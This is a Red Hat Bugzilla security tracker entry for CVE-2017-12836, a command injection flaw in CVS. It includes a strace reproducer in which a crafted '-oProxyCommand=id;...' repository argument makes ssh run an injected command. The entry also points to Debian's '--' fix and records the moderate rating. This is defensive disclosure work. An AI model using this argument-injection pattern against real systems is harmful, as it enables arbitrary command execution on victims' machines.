Bug 1480800 (CVE-2017-12836)
Summary: | CVE-2017-12836 cvs: Command injection via malicious ssh URLs | ||||||
---|---|---|---|---|---|---|---|
Product: | [Other] Security Response | Reporter: | Adam Mariš <amaris> | ||||
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> | ||||
Status: | CLOSED WONTFIX | QA Contact: | |||||
Severity: | medium | Docs Contact: | |||||
Priority: | medium | ||||||
Version: | unspecified | CC: | ppisar | ||||
Target Milestone: | --- | Keywords: | Security | ||||
Target Release: | --- | ||||||
Hardware: | All | ||||||
OS: | Linux | ||||||
Whiteboard: | |||||||
Fixed In Version: | Doc Type: | If docs needed, set a value | |||||
Doc Text: | Story Points: | --- | |||||
Clone Of: | Environment: | ||||||
Last Closed: | 2017-08-22 13:35:08 UTC | Type: | --- | ||||
Regression: | --- | Mount Type: | --- | ||||
Documentation: | --- | CRM: | |||||
Verified Versions: | Category: | --- | |||||
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |||||
Cloudforms Team: | --- | Target Upstream Version: | |||||
Embargoed: | |||||||
Bug Depends On: | 1480801 | ||||||
Bug Blocks: | 1480802, 1485460 | ||||||
Attachments: |
|
Description
Adam Mariš
2017-08-11 22:22:01 UTC
Created cvs tracking bugs for this issue: Affects: fedora-all [bug 1480801] Reproducer: $ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0 [pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0 Pseudo-terminal will not be allocated because stdin is not a terminal. [pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0 [pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0 [pid 22659] +++ exited with 0 +++ [pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} --- ssh_exchange_identification: Connection closed by remote host [pid 22658] +++ exited with 255 +++ [pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} --- [pid 22657] +++ exited with 255 +++ --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} --- cvs [checkout aborted]: end of file from server (consult above messages if any) +++ exited with 1 +++ Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument. Created attachment 1313002 [details]
Fix ported to 1.11.23
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line. Statement: Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/. |